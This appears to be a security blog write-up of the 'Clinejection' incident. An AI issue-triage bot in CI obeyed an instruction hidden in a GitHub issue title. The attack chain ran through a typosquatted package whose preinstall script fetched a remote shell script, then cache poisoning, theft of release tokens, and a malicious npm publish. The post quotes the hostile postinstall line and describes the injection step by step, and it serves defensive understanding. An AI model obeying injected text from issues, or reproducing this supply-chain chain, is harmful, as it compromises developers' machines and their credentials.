How a 12-Word Issue Title Owned 4,000 Developer Machines
TLDR
One GitHub issue title. Five steps. 4,000 compromised developer machines. Eight hours before anyone noticed.
The entry point wasn’t a zero-day. It wasn’t a misconfigured S3 bucket or a stolen password. It was natural language, a crafted string in an issue title that an AI triage bot read, interpreted as an instruction, and executed with full CI privileges.
This is Clinejection. It’s worth understanding in detail, because the attack surface it exposed isn’t unique to Cline. It’s in your repo too.
The Attack Chain Nobody Had a Playbook For
On February 17, 2026, someone published cline@2.3.0 to npm. The CLI binary was byte-identical to the previous version. The only change was one line in package.json:
json
"postinstall": "npm install -g openclaw@latest"For the next eight hours, every developer who installed or updated Cline got OpenClaw—a separate AI agent with full system access—silently installed on their machine. About 4,000 downloads before the package was pulled.
Here’s how the attacker got the npm token to publish it.
Step 1: Prompt Injection Via Issue Title
Cline had deployed an AI-powered issue triage workflow using Anthropic’s claude-code-action. The workflow allowed any GitHub user to trigger it by opening an issue. The issue title was interpolated directly into Claude’s prompt:
yaml
${{ github.event.issue.title }}No sanitisation. The attacker opened Issue #8904 with a title that looked like a performance report but contained an embedded instruction: install a package from a specific GitHub repository.
Claude read the issue title as part of the prompt. Claude followed the instruction. That’s prompt injection. It’s well-documented. It’s not new. It just hadn’t been weaponised against a CI workflow at this scale before.
Step 2: The Bot Executes Arbitrary Code
Claude ran npm install pointing to the attacker’s fork—a typosquatted repository named glthub-actions/cline. Note the missing ‘i’ in ‘github’. The fork’s package.json contained a preinstall script that fetched and executed a remote shell script.
This is where most engineers mentally say “we would catch that.” You wouldn’t. The bot ran with the privileges of the CI environment. There was no human in the loop. The operation looked like routine dependency installation.
Step 3: Cache Poisoning
The shell script deployed Cacheract—a GitHub Actions cache poisoning tool. It flooded the cache with over 10GB of data, triggering GitHub’s LRU eviction policy. The legitimate cache entries got evicted. The poisoned entries were keyed to match the pattern used by Cline’s nightly release workflow.
When that workflow ran and restored node_modules from cache, it got the compromised version.
Step 4: Credential Theft
The compromised node_modules ran during the release workflow—the one that held NPM_RELEASE_TOKEN, VSCE_PAT, and OVSX_PAT. All three exfiltrated.
Step 5: Malicious Publish
Using the stolen npm token, the attacker published cline@2.3.0 with the OpenClaw postinstall hook. The package was live for eight hours before StepSecurity’s automated monitoring flagged it—approximately 14 minutes after publication.
The Botched Rotation That Made It Worse
Security researcher Adnan Khan had discovered and reported the full vulnerability chain on January 1, 2026. He followed up multiple times over five weeks. No response.
When Khan publicly disclosed on February 9, Cline patched within 30 minutes by removing the AI triage workflows. They started credential rotation the next day.
Then they deleted the wrong token. The exposed one stayed active. They caught the error on February 11 and re-rotated—but the attacker had already exfiltrated the credentials, and the npm token remained valid long enough to publish six days later.
A separate, unknown actor had found Khan’s proof-of-concept on his test repository and weaponised it.
